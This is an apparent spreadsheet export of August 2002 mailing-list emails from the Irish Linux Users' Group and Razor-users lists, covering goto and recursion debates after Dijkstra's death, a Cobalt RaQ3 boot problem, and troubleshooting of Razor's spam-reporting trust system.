    <t>Bod wrote &gt; /Enter the rant. &gt; &gt; One thing that really bugs me is when people say things like. &gt; &gt; "On the machies we have these days you don't have to worry about &gt;  writing optimised code" or "don't worry about writing &gt;  things inline, just use a function" That sounds a lot like "sure programmers aren't needed anymore, don't all the new visual thingies mean anyone can do it"[1], or maybe "640k should be enough for anyone"[2] &gt; &gt; "Yeah and add a procedure prolog or eight", I always counter, &gt; to be told &gt; "On the machines we have these days....." &gt; &gt; Boggle. &gt; That's recursion for you. C# [1] This is often followed by "I know what I'm talking about, I can program HTML but I never need to use it" [2] Bilge denies he ever said this. --  Irish Linux Users' Group: ilug@linux.ie [URL]http://www.linux.ie[/URL] for (un)subscription information. List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: kevin lyda &lt;kevin+dated+1029244066.f56e49@ie.suberic.net&gt;\nDate: Thu, 8 Aug 2002 14:07:45 +0100</t>
  </si>
  <si>
    <t>Thu, 8 Aug 2002 14:07:45 +0100</t>
  </si>
  <si>
    <t>kevin lyda &lt;kevin+dated+1029244066.f56e49@ie.suberic.net&gt;</t>
  </si>
  <si>
    <t>On Thu, Aug 08, 2002 at 12:00:04PM +0100, Padraig Brady wrote:\n&gt; Yes a clever term usually (and deservedly) attributed to perl.\n\nthere's no need for perl to be write only.\n\n&gt; Of course you can create write-only code in any language.\n&gt; There's even a competition for obfuscated C code which is always\n&gt; worth a look: [URL]http://www.es.ioccc.org[/URL]\n\nyes, always fun.  it's a good way to learn the little details of c.\n\n&gt; p.s. what sort of processing do you do with:\n&gt; kevin+dated+1029235349.f17378@ie.suberic.net\n\nthat's a dated address:\n\n    % tmda-check-address kevin+dated+1029235349.f17378@ie.suberic.net\n    STATUS:  VALID\n    EXPIRES: Tue Aug 13 10:42:29 2002 UTC\n\nwhich means anyone can send email to that address with no problem until\nthat date.  after that they have to confirm.  more info can be found\nhere: [URL]www.tmda.net[/URL]\n\nas an aside, it is possible to filter mail to a mailman mailing list\nwith tmda as well.  subscribers can post to the list without a confirm;\nnon-subscribers would need to confirm their posts.\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ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://www.es.ioccc.org www.tmda.net http://ie.suberic.net http://www.linux.ie</t>
  </si>
  <si>
    <t>To: "'ilug@linux.ie'" &lt;ilug@linux.ie&gt;\nFrom: "Brian O'Donoghue" &lt;Brian.ODonoghue@kbs.ie&gt;\nDate: Thu, 8 Aug 2002 13:40:30 +0100</t>
  </si>
  <si>
    <t>Thu, 8 Aug 2002 13:40:30 +0100</t>
  </si>
  <si>
    <t>RE: [ILUG] slashdot EW Dijkstra humor</t>
  </si>
  <si>
    <t>&gt;Tracking it down showed that my &gt;predecessor's "add new entries to the end of its linked list" function &gt;recursively called itself with each following link until the terminating &gt;one showed up. Of course it died miserably when it ran out of stack. I'm &gt;sure he felt he'd done a good days work when he planted that bomb for &gt;me. /Enter the rant. One thing that really bugs me is when people say things like. "On the machies we have these days you don't have to worry about  writing optimised code" or "don't worry about writing  things inline, just use a function" "Yeah and add a procedure prolog or eight", I always counter, to be told "On the machines we have these days....." Boggle. --  Irish Linux Users' Group: ilug@linux.ie [URL]http://www.linux.ie[/URL] for (un)subscription information. List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: "Gregory Sloop" &lt;gregs@sloop.net&gt;\nFrom: "Craig R.Hughes" &lt;craig@deersoft.com&gt;\nDate: Thu, 8 Aug 2002 13:36:15 -0700</t>
  </si>
  <si>
    <t>Thu, 8 Aug 2002 13:36:15 -0700</t>
  </si>
  <si>
    <t>"Gregory Sloop" &lt;gregs@sloop.net&gt;</t>
  </si>
  <si>
    <t>On Thursday, August 8, 2002, at 09:05  AM, Gregory Sloop wrote:\n\n&gt; I agree (I think)....\n&gt;\n&gt; But gaming the system, for any system, (spamassassin included) is extra\n&gt; work.\n\nYes, it's definitely extra work.  The question is how much extra \nwork, both up front, and then on an ongoing basis.  I know \nnothing about how the trust system is working (still waiting for \nthat long-promised server code to be published), but now that \nit's been turned on, and the more info that's coming out about \nit, the more concerned I'm becoming that it's extremely easy to \ngame; that the initial amount of work to set up a gaming agent \nis low, and that once it's set up, it can be "fire and forget" \nin terms of continuing to operate in a way that's not easy to \ndistinguish from real user behavior.\n\n&gt; Sure, you can find a way to work almost any system, but few \n&gt; users (spammers)\n&gt; will actually take the time to game the system.\n\nAnother concern I have with the way the system might be working \nis that it might not actually require very many gamers at all to \nutterly undermine the whole system.  There are a certain number \nof possible universes where the trust system is very sensitive \nto liars, or misclassifiers of "gray" mail, or both.  It's not \nclear yet whether this universe is one of those or not.\n\n&gt; That means that we might have a system that is less than 100% \n&gt; effective, but\n&gt; perfect accuracy and effectiveness comes at a prohibitive cost. \n&gt; (Complex\n&gt; systems, time numbing hours of coding etc.)\n\nYou do need a certain level of accuracy though, or the filter is \nnot economically worthwhile.  If you only filter 75% of spam, \nyou're wasting your time.  Some people receive on the order of a \n10:1 ratio of spam:real mail -- 75% means the ratio adjusts to \n5:2 which is still shitty.  95% makes it 1:2, which is better.  \n99% makes it 1:10 which is quite nice.  As the global ratio of \nspam:mail rises, this problem gets somewhat more important.  \nWith an order of magnitude worsening of the incoming spam:real \nratio, 100:1, 99% effective still works OK.  75% effective is \nnow really, really shitty.\n\n\n&gt; I can't vouch for Razor currently, as I'm not at all \n&gt; knowledgeable. But I\n&gt; suspect the current route was picked because it was fairly simple to\n&gt; impliment, and it (at least some think) should work decently - if not\n&gt; completely without fault.\n\nTime will tell.  Time will also tell how good the system is at \nadjusting over time to gaming strategies.\n\n&gt; I put up with some garbage results in SA, simply because it \n&gt; blocks most of\n&gt; my spam, without too many false positives.\n\nSA definitely has a non-zero FP rate, and always will have.  I \nwould argue that any system will have a non-zero FP rate, \nincluding the "no filter" filter -- humans make mistakes too \nsometimes!  As spammer strategies evolve over time though, I'm \nfairly sure that SA will be able to adjust and compensate.  If \nspammers figure out how to easily pollute the SpamNet trust \nsystem, I'm not sure how easy it'll be to replace the trust \nsystem with something else.\n\n&gt; Perhaps Craig is just theorizing, but I just thought I'd offer my two\n&gt; ity-bits.\n\nLots of theorizing, most of it based on little data.  The key \npremises I'm worrying about though are:\n\n1. Trust system is easy to pollute\n2. Trust system is not personal, which makes the assumption that \nall honest voters agree on what constitutes spam\n\n\n&gt; Somthing simple, and actually implimented, that works \n&gt; reasonably well, is\n&gt; better than somthing that works perfectly, but will never be \n&gt; implimented\n&gt; because of it's cost. (The rub is that everyone defines \n&gt; "reasonably well" in\n&gt; dramatically different ways - *grin* as evidenced my the masses \n&gt; that think\n&gt; Microsoft's stuff works "resaonably well" _bah_ - [but it does \n&gt; keep me fully\n&gt; employed 'sigh']\n\nRazor2 seems to have been a long time in coming, apparently is \nquite resource intensive (judging by Cloudmark's fundraising \nefforts), and doesn't currently work.  It has great promise, and \nI'm hoping that once the wrinkles are worked through, it'll add \nanother powerful tool in the war on spam -- I'm just concerned \nthat it's getting off on the wrong foot and might not be able to \nrecover.\n\nC\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: caolan@csn.ul.ie (Caolan McNamara)\nDate: Thu, 8 Aug 2002 12:54:36 +0100</t>
  </si>
  <si>
    <t>Thu, 8 Aug 2002 12:54:36 +0100</t>
  </si>
  <si>
    <t>On Thu, Aug 08, 2002 at 12:14:09 +0100, Matthew French wrote:\n&gt; JPL suggested:\n&gt; &gt;  Recursion is only truely useful if you have an infinite stack. People\n&gt; &gt; that think they have an infinite stack shouldn't be let near a compiler.\n&gt; \n&gt; Well, when studying engineering the rule of thumb was that infinity was 10\n&gt; times bigger then the most you could expect to use.\n&gt; \n&gt; Therefore I believe in infinite stack.\n\nI worked on a testharness for (wait for it) petrol pumps some years ago,\nlittle embeded controller spoke to its DOS (not exactly the easiest\nenvironment to track crashing bugs under) master which logged its\npiteous whinings. I inherited the dos part of it and worked mostly on\ncreating the other end of it. Near the end of the project we gave it\nextensive long burnin tests, sadly overnight tests would always crash\nout for some obscure reason.  Tracking it down showed that my\npredecessor's "add new entries to the end of its linked list" function\nrecursively called itself with each following link until the terminating\none showed up. Of course it died miserably when it ran out of stack. I'm\nsure he felt he'd done a good days work when he planted that bomb for\nme.\n\nC.\n-- \nCaolan McNamara               |  caolan@skynet.ie  \n[URL]http://www.skynet.ie[/URL]  |  +353 86 8161184\nSo much insanity, so little time...\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: &lt;ilug@linux.ie&gt;\nFrom: "Matthew French" &lt;mfrench42@yahoo.co.uk&gt;\nDate: Thu, 8 Aug 2002 12:14:09 +0100</t>
  </si>
  <si>
    <t>Thu, 8 Aug 2002 12:14:09 +0100</t>
  </si>
  <si>
    <t>JPL suggested: &gt;  Recursion is only truely useful if you have an infinite stack. People &gt; that think they have an infinite stack shouldn't be let near a compiler. Well, when studying engineering the rule of thumb was that infinity was 10 times bigger then the most you could expect to use. Therefore I believe in infinite stack. But I do not feel I am a compiler risk either. So where does this leave me? - Matthew __________________________________________________ Do You Yahoo!? Everything you'll ever need on one web page from News and Sport to Email and Music Charts [URL]http://uk.my.yahoo.com[/URL] --  Irish Linux Users' Group: ilug@linux.ie [URL]http://www.linux.ie[/URL] for (un)subscription information. List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: "'ilug@linux.ie'" &lt;ilug@linux.ie&gt;\nFrom: "Hunt, Bryan" &lt;B.Hunt@emuse-tech.com&gt;\nDate: Thu, 8 Aug 2002 11:55:36 +0100</t>
  </si>
  <si>
    <t>Thu, 8 Aug 2002 11:55:36 +0100</t>
  </si>
  <si>
    <t>schemers are often slagged of for that sort of thing  they "know the Value of Everything, Cost of Nothing"  did i get that the right way arround ? --B -----Original Message----- From: John P. Looney [mailto:valen@tuatha.org] Sent: 08 August 2002 11:38 To: ilug@linux.ie Subject: Re: [ILUG] slashdot EW Dijkstra humor On Thu, Aug 08, 2002 at 11:27:59AM +0100, wintermute mentioned: &gt; Interesting. I've always wondered about things 'considered' to be bad.  &gt; Example the GOTO, most languages support a goto of some sort, so are gotos really bad?  Yes. Especially in the languages he was talking about - C, Pascal and Assembler. Goto's can be used well; there are a few used in the kernel code to improve efficency. They are almost required in some languages (like C) where 'break' or 'continue' can't be told how many loops/switches to break out of.  But, in general, goto's make a mess of code. &gt; Is a loop or a recursive call actually any better than a goto  &gt; or is the goto used as a kind of common enemy of  &gt; programming syntax &gt; to make sure people use loops or recursion? &gt; &lt;&gt;  Recursion is only truely useful if you have an infinite stack. People that think they have an infinite stack shouldn't be let near a compiler. &gt; Kind of makes you wonder about things considered to be 'good'.  For &gt; example people bang on about polymorphism, but is there actually any &gt; advantage in using an overloaded function based on class inheritance?  I don't care, to be honest. Kate --  Irish Linux Users' Group: ilug@linux.ie [URL]http://www.linux.ie[/URL] for (un)subscription information. List maintainer: listmaster@linux.ie --  Irish Linux Users' Group: ilug@linux.ie [URL]http://www.linux.ie[/URL] for (un)subscription information. List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: Scott Wunsch &lt;ilug@tracking.wunsch.org&gt;\nDate: Thu, 8 Aug 2002 11:51:18 -0600</t>
  </si>
  <si>
    <t>Thu, 8 Aug 2002 11:51:18 -0600</t>
  </si>
  <si>
    <t>Scott Wunsch &lt;ilug@tracking.wunsch.org&gt;</t>
  </si>
  <si>
    <t>Re: [ILUG] Cobalt question</t>
  </si>
  <si>
    <t>On Thu, 08-Aug-2002 at 11:31:01 +0100, John P. Looney wrote:\n\n&gt;  I've installed Redhat 7.3 on a raq3's disk. But fscked if I can get the\n&gt; kernel in /boot/vmlinuz-2.4.18-3 to boot. It's insisting pulling the\n&gt; kernel from ... somewhere else. The old cobalt kernel.\n\n[URL]http://www.gurulabs.com[/URL]\n\nThe Cobalt systems have some neat firmware boot code that will read the\next2 filesystem and find the kernel itself... if you put it exactly where\nthey expect it.\n\n-- \nTake care,\nScott \\'unsch\n\n... Old musicians never die, they just decompose.\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://www.gurulabs.com http://www.linux.ie</t>
  </si>
  <si>
    <t>To: wintermute &lt;cout@eircom.net&gt;\nFrom: kevin lyda &lt;kevin+dated+1029235349.f17378@ie.suberic.net&gt;\nDate: Thu, 8 Aug 2002 11:42:27 +0100</t>
  </si>
  <si>
    <t>Thu, 8 Aug 2002 11:42:27 +0100</t>
  </si>
  <si>
    <t>kevin lyda &lt;kevin+dated+1029235349.f17378@ie.suberic.net&gt;</t>
  </si>
  <si>
    <t>speaking of things considered harmful, line lengths of over 80 chars\nare considered harmful.  cut it out.\n\nOn Thu, Aug 08, 2002 at 11:27:59AM +0100, wintermute wrote:\n&gt; Interesting. I've always wondered about things 'considered' to be bad. \n&gt; Example the GOTO, most languages support a goto of some sort, so are\n&gt; gotos really bad?\n\nif used properly, they actually can make code more readable.  but those\nproper occasions are quite rare really.  it's a good idea to avoid them\nsince over use of goto will create what niall calls "write-only code."\nwhat a wonderful expression.  my professors would spend entire lectures\nexplaining that concept, and yet three little words convey it so well.\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ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: "John P. Looney" &lt;valen@tuatha.org&gt;\nDate: Thu, 8 Aug 2002 11:37:49 +0100</t>
  </si>
  <si>
    <t>Thu, 8 Aug 2002 11:37:49 +0100</t>
  </si>
  <si>
    <t>On Thu, Aug 08, 2002 at 11:27:59AM +0100, wintermute mentioned: &gt; Interesting. I've always wondered about things 'considered' to be bad.  &gt; Example the GOTO, most languages support a goto of some sort, so are gotos really bad?  Yes. Especially in the languages he was talking about - C, Pascal and Assembler. Goto's can be used well; there are a few used in the kernel code to improve efficency. They are almost required in some languages (like C) where 'break' or 'continue' can't be told how many loops/switches to break out of.  But, in general, goto's make a mess of code. &gt; Is a loop or a recursive call actually any better than a goto  &gt; or is the goto used as a kind of common enemy of  &gt; programming syntax &gt; to make sure people use loops or recursion? &gt; &lt;&gt;  Recursion is only truely useful if you have an infinite stack. People that think they have an infinite stack shouldn't be let near a compiler. &gt; Kind of makes you wonder about things considered to be 'good'.  For &gt; example people bang on about polymorphism, but is there actually any &gt; advantage in using an overloaded function based on class inheritance?  I don't care, to be honest. Kate --  Irish Linux Users' Group: ilug@linux.ie [URL]http://www.linux.ie[/URL] for (un)subscription information. List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: "John P. Looney" &lt;valen@tuatha.org&gt;\nDate: Thu, 8 Aug 2002 11:31:01 +0100</t>
  </si>
  <si>
    <t>Thu, 8 Aug 2002 11:31:01 +0100</t>
  </si>
  <si>
    <t>[ILUG] Cobalt question</t>
  </si>
  <si>
    <t>Try this little problem on for size:\n\n I've installed Redhat 7.3 on a raq3's disk. But fscked if I can get the\nkernel in /boot/vmlinuz-2.4.18-3 to boot. It's insisting pulling the\nkernel from ... somewhere else. The old cobalt kernel.\n\n I've booted the disk with a redhat rescue CD, and installed grub on the\nMBR and hda1 &amp; hda2 (just in case). No luck. The cobalt BIOS says "Booting\ndefault method - From disk".\n\n Any ideas how I can get this thing to boot *my* kernel ? Anyone care to\nguess how the cobalt boot process ? Google seems very quiet on the\nsubject of the cobalt boot process, and what is there doesn't seem to\nwork. Simple stuff like:\n\n (how to boot a different kernel)\n [URL]http://list.cobalt.com[/URL]\n\n And, on boot:\n\nCobalt:Main Menu&gt; bfd /boot/vmlinuz-2.4.18-3\nFirst stage kernel: Decompressing - done\nSecond stage kernel: Decompressing - done\nLinux version 2.2.16C28 (konkers@unicron.cobalt.com)\n\n Note the descrepancy between what I want to boot, and actually booted.\n\nKate\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: "wintermute" &lt;cout@eircom.net&gt;\nDate: Thu, 8 Aug 2002 11:27:59 +0100</t>
  </si>
  <si>
    <t>Thu, 8 Aug 2002 11:27:59 +0100</t>
  </si>
  <si>
    <t>&gt;  &gt; Thought this was funny. &gt; In the slashdot thread about &gt; EW Dijkstra passing away on &gt; tuesday, there was: &gt;  &gt; GOTO Heaven &gt;        Re:GOTO Heaven &gt;        I'll bet he gets there by the shortest path. &gt;  &gt; Referring to his "Goto considered harmful" etc. &gt;  &gt; Sad to see these people go. 3 others I've &gt; noticed lately were: Richard Stevens, Jim Ellis &gt; and Jon Postel. &gt;  &gt; Pdraig. Interesting. I've always wondered about things 'considered' to be bad.  Example the GOTO, most languages support a goto of some sort, so are gotos really bad? Is a loop or a recursive call actually any better than a goto  or is the goto used as a kind of common enemy of  programming syntax to make sure people use loops or recursion? &lt;&gt; Kind of makes you wonder about things considered to be 'good'. For example people bang on about polymorphism, but is there actually any advantage in using an overloaded function based on class inheritance? Hmm. I'm only laughing on the outside  My smile is just skin deep  If you could see inside I'm really crying  You might join me for a weep. &lt;&gt; --  Irish Linux Users' Group: ilug@linux.ie [URL]http://www.linux.ie[/URL] for (un)subscription information. List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: &lt;mail@vipul.net&gt;, &lt;razor-users@example.sourceforge.net&gt;\nFrom: "Rose, Bobby" &lt;brose@med.wayne.edu&gt;\nDate: Thu, 8 Aug 2002 10:19:46 -0400</t>
  </si>
  <si>
    <t>Thu, 8 Aug 2002 10:19:46 -0400</t>
  </si>
  <si>
    <t>&lt;mail@vipul.net&gt;, &lt;razor-users@example.sourceforge.net&gt;</t>
  </si>
  <si>
    <t>Oh yeh one more thing.  None of this would explain why the signatures for sample-spam.txt from spamassassin is registered on honor but not apt or fire. -----Original Message----- From: Rose, Bobby  Sent: Thursday, August 08, 2002 9:54 AM To: mail@vipul.net; razor-users@example.sourceforge.net Subject: RE: [Razor-users] What's wrong with the Razor servers now? Thanks that helps.  There's still so little info on TES and those of us here since RazorV1 know how it works.  I did set my min_cf to "ac-100" which I thought would be zero.   So the way you are suggesting that it works now is that everyone has a trust level of 1 and have to work their way up.  Your trust level increases when someone nominates the same message as spam. This must have been the new changes made at the beginning of the week unless the changes dumped everyone's trust level.  Now here come the questions... What engine signature does TES look at?  Does it have to be the same e1 signature or does it use the e2 or e4 signatures.  How many people have to nominate the message before everyones rating increases?  How many revokes decreases someones rating?  Does a single revoke decrease the rating of everyone that nominated the message?  If a newby reports a message that has already been reported does their trust level immediately go up?  In the case of revoking, does someone with a trust level of 1 have the capability to revoke a message submitted by multiple people with higher trust levels? -----Original Message----- From: Vipul Ved Prakash [mailto:mail@vipul.net]  Sent: Thursday, August 08, 2002 4:22 AM To: razor-users@example.sourceforge.net Subject: Re: [Razor-users] What's wrong with the Razor servers now? Bobby,  Couple of things:  If you are not a trusted reporter, your reports will not have an immediate effect. It takes a bunch of trusted reporters to bump up the confidence of a signature to a point where it is considered to be spam. This might be frustrating initially, but as the number of trusted users grows the time delay between nominations and determination will become shorter. Of course, it's a lot more frustating for people to have their legit mail filtered out due to incorrect reporting. Also, for the purpose of testing, I'd suggest making your min_cf (in razor-agents.conf) to 0. min_cf defaults to the server recommended average confidence, which at the moment is 1. Setting min_cf to 0 should return true for whatever you submit (as long as it was not revoked by a trusted user). apt/fire sync with honor every 5 minutes, so you'd have to wait for a _maximum_ of 5 minutes before signatures propagate. cheers, vipul. On Wed, Aug 07, 2002 at 11:51:21PM -0400, Rose, Bobby wrote: &gt; This is still happening.  Nothing that I report is being registered at &gt; all.  I have confirmed that this also affects the Cloudmark Outlook &gt; plugin. If I block a message from Outlook using Spamnet then run it  &gt; against the folder containing the message that was reported then  &gt; nothing happens. &gt;  &gt; On the unix side, I've tried different cloudmark servers, different &gt; identies, report from different systems, etc without an effect.  I did &gt; find that sample-spam.txt from Spamassassin is only registered on &gt; honor.cloudmark.net and comes back positive from it and it only so  &gt; it's clearly not sync'd with apt or fire. &gt;  &gt;  &gt;  &gt; -----Original Message----- &gt; From: Rose, Bobby &gt; Sent: Wednesday, August 07, 2002 1:32 PM &gt; To: Patrick &gt; Cc: ML-razor-users &gt; Subject: RE: [Razor-users] What's wrong with the Razor servers now? &gt;  &gt;  &gt; I'm sure others have thought of that.  Probably the only way to &gt; prevent that is to include the host in the report/revoke  &gt; authentication. &gt;  &gt; -----Original Message----- &gt; From: Patrick [mailto:patrick@stealthgeeks.net] &gt; Sent: Wednesday, August 07, 2002 12:33 PM &gt; To: Rose, Bobby &gt; Cc: ML-razor-users &gt; Subject: RE: [Razor-users] What's wrong with the Razor servers now? &gt;  &gt;  &gt; On Wed, 7 Aug 2002, Rose, Bobby wrote: &gt;  &gt; &gt; Well at least it's been confirmed. I can say for cetain that it &gt; &gt; started on Monday since that was when I noticed a huge drop in stats &gt; of messages &gt; &gt; that were tagged as being in razor.   And I know it was fine on &gt; Friday. &gt; &gt; It may have something to do with the upgrades on the servers that &gt; &gt; Vipul mentioned.  If TES is going to decide on what gets registered  &gt; &gt; and what doesn't then razor-report should provide some debug info  &gt; &gt; about the refusal.  You are correct about the need for more info on  &gt; &gt; TES, but it probably won't happen for fear of circumvention. &gt;  &gt;  &gt;  &gt; On the way into work I thought of some fairly easy ways to circumvent &gt; what I imagine the current trust model to be based on individual users &gt; blindly submitting reports and checking results. &gt;  &gt; It's hard to imagine others haven't as well, as I'm not too bright. &gt;  &gt;  &gt; /\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\ &gt; /\ &gt; /\/\/\ &gt;                                Patrick Greenwell &gt;          Asking the wrong questions is the leading cause of wrong  &gt; answers &gt; \/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/ &gt; \/\/\/ &gt;  &gt;  &gt;  &gt; ------------------------------------------------------- &gt; This sf.net email is sponsored by:ThinkGeek &gt; Welcome to geek heaven. &gt; [URL]http://thinkgeek.com[/URL] &gt; _______________________________________________ &gt; Razor-users mailing list &gt; Razor-users@lists.sourceforge.net &gt; [URL]https://lists.sourceforge.net[/URL] &gt;  &gt;  &gt; ------------------------------------------------------- &gt; This sf.net email is sponsored by:ThinkGeek &gt; Welcome to geek heaven. &gt; [URL]http://thinkgeek.com[/URL] &gt; _______________________________________________ &gt; Razor-users mailing list &gt; Razor-users@lists.sourceforge.net  &gt; [URL]https://lists.sourceforge.net[/URL] --  Vipul Ved Prakash          |   "The future is here, it's just not  Software Design Artist     |    widely distributed." [URL]http://vipul.net[/URL]          |              -- William Gibson ------------------------------------------------------- This sf.net email is sponsored by:ThinkGeek Welcome to geek heaven. [URL]http://thinkgeek.com[/URL] _______________________________________________ Razor-users mailing list Razor-users@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL] ------------------------------------------------------- This sf.net email is sponsored by:ThinkGeek Welcome to geek heaven. [URL]http://thinkgeek.com[/URL] _______________________________________________ Razor-users mailing list Razor-users@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL] ------------------------------------------------------- This sf.net email is sponsored by:ThinkGeek Welcome to geek heaven. [URL]http://thinkgeek.com[/URL] _______________________________________________ Razor-users mailing list Razor-users@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>http://thinkgeek.com https://lists.sourceforge.net http://thinkgeek.com https://lists.sourceforge.net http://vipul.net http://thinkgeek.com https://lists.sourceforge.net http://thinkgeek.com https://lists.sourceforge.net http://thinkgeek.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: "Justin Mason" &lt;yyyy@spamassassin.taint.org&gt;,\nFrom: "Rose, Bobby" &lt;brose@med.wayne.edu&gt;\nDate: Thu, 8 Aug 2002 09:55:32 -0400</t>
  </si>
  <si>
    <t>Thu, 8 Aug 2002 09:55:32 -0400</t>
  </si>
  <si>
    <t>RE: [Razor-users] New to razor</t>
  </si>
  <si>
    <t>I concur, but just ignore the razor errors during the make test of\nspamassassin.  That recently started failing but appears just to be the\ntest failing.  \n\n-----Original Message-----\nFrom: Justin Mason [mailto:yyyy@spamassassin.taint.org] \nSent: Thursday, August 08, 2002 9:07 AM\nTo: Michael Graff\nCc: razor-users@example.sourceforge.net\nSubject: Re: [Razor-users] New to razor \n\n\n\nMichael Graff said:\n\n&gt; I'm trying to get spamassassin 2.31 and razor (latest) to play \n&gt; together.  From what I see, this isn't likely to happen trivially,\n\nMike -- use the CVS version of SpamAssassin.  it works well and supports\nRazor 2.\n\n--j.\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL] _______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: &lt;mail@vipul.net&gt;, &lt;razor-users@example.sourceforge.net&gt;\nFrom: "Rose, Bobby" &lt;brose@med.wayne.edu&gt;\nDate: Thu, 8 Aug 2002 09:53:35 -0400</t>
  </si>
  <si>
    <t>Thu, 8 Aug 2002 09:53:35 -0400</t>
  </si>
  <si>
    <t>Thanks that helps.  There's still so little info on TES and those of us here since RazorV1 know how it works.  I did set my min_cf to "ac-100" which I thought would be zero.   So the way you are suggesting that it works now is that everyone has a trust level of 1 and have to work their way up.  Your trust level increases when someone nominates the same message as spam. This must have been the new changes made at the beginning of the week unless the changes dumped everyone's trust level.  Now here come the questions... What engine signature does TES look at?  Does it have to be the same e1 signature or does it use the e2 or e4 signatures.  How many people have to nominate the message before everyones rating increases?  How many revokes decreases someones rating?  Does a single revoke decrease the rating of everyone that nominated the message?  If a newby reports a message that has already been reported does their trust level immediately go up?  In the case of revoking, does someone with a trust level of 1 have the capability to revoke a message submitted by multiple people with higher trust levels? -----Original Message----- From: Vipul Ved Prakash [mailto:mail@vipul.net]  Sent: Thursday, August 08, 2002 4:22 AM To: razor-users@example.sourceforge.net Subject: Re: [Razor-users] What's wrong with the Razor servers now? Bobby,  Couple of things:  If you are not a trusted reporter, your reports will not have an immediate effect. It takes a bunch of trusted reporters to bump up the confidence of a signature to a point where it is considered to be spam. This might be frustrating initially, but as the number of trusted users grows the time delay between nominations and determination will become shorter. Of course, it's a lot more frustating for people to have their legit mail filtered out due to incorrect reporting. Also, for the purpose of testing, I'd suggest making your min_cf (in razor-agents.conf) to 0. min_cf defaults to the server recommended average confidence, which at the moment is 1. Setting min_cf to 0 should return true for whatever you submit (as long as it was not revoked by a trusted user). apt/fire sync with honor every 5 minutes, so you'd have to wait for a _maximum_ of 5 minutes before signatures propagate. cheers, vipul. On Wed, Aug 07, 2002 at 11:51:21PM -0400, Rose, Bobby wrote: &gt; This is still happening.  Nothing that I report is being registered at &gt; all.  I have confirmed that this also affects the Cloudmark Outlook  &gt; plugin. If I block a message from Outlook using Spamnet then run it  &gt; against the folder containing the message that was reported then  &gt; nothing happens. &gt;  &gt; On the unix side, I've tried different cloudmark servers, different  &gt; identies, report from different systems, etc without an effect.  I did &gt; find that sample-spam.txt from Spamassassin is only registered on  &gt; honor.cloudmark.net and comes back positive from it and it only so  &gt; it's clearly not sync'd with apt or fire. &gt;  &gt;  &gt;  &gt; -----Original Message----- &gt; From: Rose, Bobby &gt; Sent: Wednesday, August 07, 2002 1:32 PM &gt; To: Patrick &gt; Cc: ML-razor-users &gt; Subject: RE: [Razor-users] What's wrong with the Razor servers now? &gt;  &gt;  &gt; I'm sure others have thought of that.  Probably the only way to  &gt; prevent that is to include the host in the report/revoke  &gt; authentication. &gt;  &gt; -----Original Message----- &gt; From: Patrick [mailto:patrick@stealthgeeks.net] &gt; Sent: Wednesday, August 07, 2002 12:33 PM &gt; To: Rose, Bobby &gt; Cc: ML-razor-users &gt; Subject: RE: [Razor-users] What's wrong with the Razor servers now? &gt;  &gt;  &gt; On Wed, 7 Aug 2002, Rose, Bobby wrote: &gt;  &gt; &gt; Well at least it's been confirmed. I can say for cetain that it  &gt; &gt; started on Monday since that was when I noticed a huge drop in stats &gt; of messages &gt; &gt; that were tagged as being in razor.   And I know it was fine on &gt; Friday. &gt; &gt; It may have something to do with the upgrades on the servers that  &gt; &gt; Vipul mentioned.  If TES is going to decide on what gets registered  &gt; &gt; and what doesn't then razor-report should provide some debug info  &gt; &gt; about the refusal.  You are correct about the need for more info on  &gt; &gt; TES, but it probably won't happen for fear of circumvention. &gt;  &gt;  &gt;  &gt; On the way into work I thought of some fairly easy ways to circumvent  &gt; what I imagine the current trust model to be based on individual users &gt; blindly submitting reports and checking results. &gt;  &gt; It's hard to imagine others haven't as well, as I'm not too bright. &gt;  &gt;  &gt; /\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\ &gt; /\ &gt; /\/\/\ 